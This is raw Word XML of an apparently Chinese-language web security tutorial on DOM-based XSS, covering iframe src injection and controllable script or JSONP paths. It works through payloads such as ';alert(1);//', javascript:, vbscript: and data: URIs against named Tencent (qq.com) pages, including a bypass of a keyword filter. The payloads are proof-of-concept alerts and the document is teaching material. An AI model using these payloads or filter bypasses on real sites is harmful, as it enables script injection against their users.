          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;alert</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(1);//="aaaa";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下图：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3286F29" wp14:editId="513D5CD2">
            <wp:extent cx="5715000" cy="1285875"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="50" name="图片 50" descr="55.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId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5.jpg">
                      <a:hlinkClick r:id="rId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50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52E6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么是不是将会执行我们的alert(1);呢？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根据上面内容，我们可以构造代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52E6A" w:rsidRPr="009C207F" w:rsidTr="00C52E6A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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kf.qq.com/search_app.shtml?key;alert(1);//=aaaa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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OHO～，如我们所愿的弹出了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005440EB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3A1ED7D4" wp14:editId="4C4ABD4D">
            <wp:extent cx="5715000" cy="2867025"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="51" name="图片 51" descr="56.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId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6.jpg">
                      <a:hlinkClick r:id="rId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8A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51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52E6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6.不知道看完上面的，有没有</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>娃注意</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>到，后面的aaaa不是也可以构造吗？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C52E6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this.key="aaaa";换为</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C52E6A" w:rsidRPr="009C207F" w:rsidRDefault="00C52E6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this.key="aaa"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;alert</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(1);//";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确实是如此:)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C52E6A" w:rsidRPr="009C207F" w:rsidTr="00C52E6A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00C52E6A" w:rsidRPr="009C207F" w:rsidRDefault="00C52E6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kf.qq.com/search_app.shtml?key=aaa";</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="009C207F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>alert(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="009C207F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>1);//</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00297FA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个在IE</w:t>
      </w:r>
      <w:r w:rsidR="00297FAA" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下一样是可以的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00297FA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但是这样在chrome下却不行。原因其实上面一节教程也提到过。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00297FA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chrome会自动对",&gt;,&lt;进行转换。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00297FA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因而</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00297FAA" w:rsidRPr="009C207F" w:rsidRDefault="00297FA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this.key="aaa"</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;alert</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(1);//";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00297FA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会变成</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00297FAA" w:rsidRPr="009C207F" w:rsidRDefault="00297FA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this.key="aaa%22</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>;alert</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(1);//";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00297FA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从而失效。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00297FA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7.上面就是本篇教程了，我们再来看看题外话。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0019368A" w:rsidRPr="009C207F" w:rsidRDefault="0019368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其实以上问题，不是单独存在的。在另外一个页面也是存在的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D84DCF" w:rsidRPr="009C207F" w:rsidRDefault="00D84DCF" w:rsidP="00D84DC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19368A" w:rsidRPr="009C207F" w:rsidRDefault="0019368A" w:rsidP="009A6E70">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>第十一节</w:t>
      </w:r>
      <w:r w:rsidR="00376506" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DomXss</w:t>
      </w:r>
      <w:r w:rsidR="00376506" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进阶</w:t>
      </w:r>
      <w:r w:rsidR="00376506" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00376506" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>善变</w:t>
      </w:r>
      <w:r w:rsidR="00376506" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>iframe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376506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有时候，输出还会出现在&lt;iframesrc="[输出]"&gt;&lt;/iframe&gt;。iframe的src属性本来应该是一个网址，但是iframe之善变，使得它同样可以执行javascript，而且可以用不同的姿势来执行。这一类问题，我将其归为[路径可控]问题。当然上面说到的是普通的反射型XSS。有时候程序员会使用javascript来动态的改变iframe的src属性，譬如：iframeA.src="[可控的url]";同样会导致XSS问题，来看看本例吧～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.先来说</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>说</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>iframe的变化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最好懂的，onload执行</w:t>
      </w:r>
      <w:r w:rsidR="00297FAA" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:r w:rsidR="00DA2931" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>: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B318CA" w:rsidRPr="009C207F" w:rsidTr="00B318CA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B318CA" w:rsidRPr="009C207F" w:rsidRDefault="00B318C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iframeonload="alert(1)"&gt;&lt;/iframe&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="009C207F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="009C207F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>src执行javascript代码</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00B318CA" w:rsidRPr="009C207F" w:rsidRDefault="00B318C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iframesrc="javascript:alert(1)"&gt;&lt;/iframe&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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IE下vbscript执行代码</w:t>
      </w:r>
      <w:r w:rsidR="00DA2931" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>: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B318CA" w:rsidRPr="009C207F" w:rsidTr="00B318CA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B318CA" w:rsidRPr="009C207F" w:rsidRDefault="00B318C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iframesrc="vbscript:msgbox(1)"&gt;&lt;/iframe&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Chrome下data协议执行代码</w:t>
      </w:r>
      <w:r w:rsidR="00DA2931" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>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B318CA" w:rsidRPr="009C207F" w:rsidTr="00B318CA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B318CA" w:rsidRPr="009C207F" w:rsidRDefault="00B318C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iframesrc="data:text/html,&lt;script&gt;alert(1)&lt;/script&gt;"&gt;&lt;/iframe&gt;Chrome</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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上面的变体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B318CA" w:rsidRPr="009C207F" w:rsidTr="00B318CA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B318CA" w:rsidRPr="009C207F" w:rsidRDefault="00B318C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iframesrc="data:text/html,&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;"&gt;&lt;/iframe&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00B318C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Chrome下srcdoc属性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B318CA" w:rsidRPr="009C207F" w:rsidTr="00B318CA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00B318CA" w:rsidRPr="009C207F" w:rsidRDefault="00B318C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iframesrcdoc="&amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;"&gt;&lt;/iframe&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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2.有兴趣的，可以一个一个的去测试上面的效果，注意浏览器的特异性哦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3.接着我们来看看具体的例子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97FAA" w:rsidRPr="009C207F" w:rsidTr="00297FAA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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helper.qq.com/appweb/tools/tool-detail.shtml?turl=aaaaaa&amp;gid=yl&amp;cid=68&amp;from=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我们先开调试工具，看看有没有可见的输出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A4D1247" wp14:editId="29C32FCC">
            <wp:extent cx="5715000" cy="2971800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="56" name="图片 56" descr="57.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId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.jpg">
                      <a:hlinkClick r:id="rId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52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，我们参数的aaaaaa被带入到了&lt;iframesrc="这里"&gt;&lt;/iframe&gt;。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00297FAA" w:rsidRPr="009C207F" w:rsidRDefault="00B318C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5.</w:t>
      </w:r>
      <w:r w:rsidR="00376506" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这样一来，就满足了我们的使用条件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试试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97FAA" w:rsidRPr="009C207F" w:rsidTr="00297FAA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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helper.qq.com/appweb/tools/tool-detail.shtml?turl=javascript:alert(1);&amp;gid=yl&amp;cid=68&amp;from=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。。竟然没反应。我们来看看刚才的那个地方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400D5E34" wp14:editId="5BE3DA77">
            <wp:extent cx="5715000" cy="3867150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="55" name="图片 55" descr="58.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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8.jpg">
                      <a:hlinkClick r:id="rId1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5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可以看到，src这次没属性了，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>看来腾讯做了</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>什么过滤。我们继续搜索下一个toolframe试试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恩，看来就是这段代码导致的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4F40DE72" wp14:editId="06A2A5BE">
            <wp:extent cx="5715000" cy="1638300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="54" name="图片 54" descr="59.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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9.jpg">
                      <a:hlinkClick r:id="rId1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 w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:instrText>SEQ 图 \* ARABIC</w:instrText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54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一起看看这段代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97FAA" w:rsidRPr="009C207F" w:rsidTr="00297FAA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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functionOpenFrame(url){</w:t>
            </w:r>
          </w:p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if(url.toLowerCase().indexOf('http://')!='-1'||url.toLowerCase().indexOf('https://')!='-1'||url.toLowerCase().indexOf('javascript:')!='-1')returnfalse;</w:t>
            </w:r>
          </w:p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document.getElementById("toolframe").src=url;</w:t>
            </w:r>
          </w:p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不难看出，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>腾讯对</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>javascript:做出了判断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97FAA" w:rsidRPr="009C207F" w:rsidTr="00297FAA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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document.getElementById("toolframe").src=url;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句是导致XSS的一句代码。而openFrame的url参数则来自于(无关代码省略)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7FAA" w:rsidRPr="009C207F" w:rsidTr="00297FAA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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...</w:t>
            </w:r>
          </w:p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vartool_url=getQueryStringValue("turl");</w:t>
            </w:r>
          </w:p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...</w:t>
            </w:r>
          </w:p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enFrame(tool_url);</w:t>
            </w:r>
          </w:p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...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00297FAA" w:rsidRPr="009C207F" w:rsidRDefault="00B318C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6.</w:t>
      </w:r>
      <w:r w:rsidR="00376506" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>根据我们上面说道的iframe的利用方法，我们不难看出，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00376506" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>腾讯的</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00376506" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>过滤是不完善的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在IE下，我们可以使用vbscript来执行代码。vbscript里'单引号表示注释，类似JS里的//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97FAA" w:rsidRPr="009C207F" w:rsidTr="00297FAA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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helper.qq.com/appweb/tools/tool-detail.shtml?turl=vbscript:msgbox(1)'&amp;gid=yl&amp;cid=68&amp;from=</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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28BD13D6" wp14:editId="78AEB9DA">
            <wp:extent cx="5715000" cy="1914525"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="53" name="图片 53" descr="60.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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0.jpg">
                      <a:hlinkClick r:id="rId1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55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在chrome下，我们可以用data协议来执行JS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97FAA" w:rsidRPr="009C207F" w:rsidTr="00297FAA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
          </w:tcPr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lastRenderedPageBreak/>
              <w:t>http://helper.qq.com/appweb/tools/tool-detail.shtml?turl=data:text/html,&lt;script&gt;alert(1)&lt;/script&gt;'&amp;gid=yl&amp;cid=68&amp;from=</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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621CDA7A" wp14:editId="07F664F2">
            <wp:extent cx="5715000" cy="2171700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="52" name="图片 52" descr="61.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId10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1.jpg">
                      <a:hlinkClick r:id="rId10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56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84DCF" w:rsidRPr="009C207F" w:rsidRDefault="00D84DCF" w:rsidP="00D84DC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376506" w:rsidRPr="009C207F" w:rsidRDefault="00376506" w:rsidP="009A6E70">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第十二节</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DomXss</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进阶</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路径</w:t>
      </w:r>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>con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376506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不是萝</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>莉</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>con,我是路径con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一些程序员会动态的加载json数据，同域的时候，可以使用ajax；而有时候，数据所在域和当前页面所在域又不一致。所以需要跨域请求。跨域请求数据的手段中，有一种叫做jsonp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用代码表示的话，就是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somescript.src=</w:t>
      </w:r>
      <w:r w:rsidR="00297FAA" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://otherdomain.com/xx?jsonp=callback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某些时候，程序员会在调用外部数据的时候带上可控的参数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somescript.src="http://otherdomain.</w:t>
      </w:r>
      <w:r w:rsidR="00297FAA" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>com/xx?jsonp=callback&amp;id="+id;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果这个id我们可控，将可能带来XSS问题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本次教程，就不像前面的一样，去细说操作过程了，前面的几次教程也基本将常用操作全部介绍到了。直接来看例子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.在扫描过程中，经常遇到下面的例子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28B5D9A" wp14:editId="07928D94">
            <wp:extent cx="5715000" cy="1057275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="57" name="图片 57" descr="1.jpg">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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.jpg">
                      <a:hlinkClick r:id="rId1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57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97FAA" w:rsidRPr="009C207F" w:rsidRDefault="00376506" w:rsidP="009C207F">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:after="240" w:line="375" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2.初看看，这种情况，似乎没有什么利用价值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3.但是我们不难想象，如果这个地址是我们可控的话，一样会带来威胁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地址的可控可以分为3个层面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scriptsrc="完全可控",这种就简单了，直接将地址换为我们的JS地址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scriptsrc="/path/xxx/[路径可控</w:t>
      </w:r>
      <w:r w:rsidR="00297FAA" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]/1.</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00297FAA" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00297FAA" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>"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种要利用的话，需要同域名下有可控的文件。可控文件又分为2种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直接上传文本至同域名下，不一定要是HTML文件，需要上传点有过滤缺陷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参数可控，利用可用的json接口。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B318C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最终变为</w:t>
      </w:r>
      <w:r w:rsidR="00B318CA" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：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scriptsrc</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>="/path/xxx/.../</w:t>
      </w:r>
      <w:r w:rsidR="00297FAA" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>yyy/xx.json?callback=alert(1)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scriptsrc="/xxxx/json.php?callback=xxxx&amp;param1=yyy&amp;param2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数可控</w:t>
      </w:r>
      <w:r w:rsidR="00297FAA" w:rsidRPr="009C207F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>]"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种情况，和3.2.2类似，如果参数可控，且json的参数没有很好的过滤时。我们就有机可乘了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本文以拍拍网一处XSS为例，来描述以上可能性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扫描器扫到的点，见步骤1中的图。进一步，我们可以通过抓包的方式，看到页面在打开时，所加载的外部JS文件地址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97FAA" w:rsidRPr="009C207F" w:rsidTr="00297FAA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:shd w:val="pct25" w:color="auto" w:fill="auto"/>
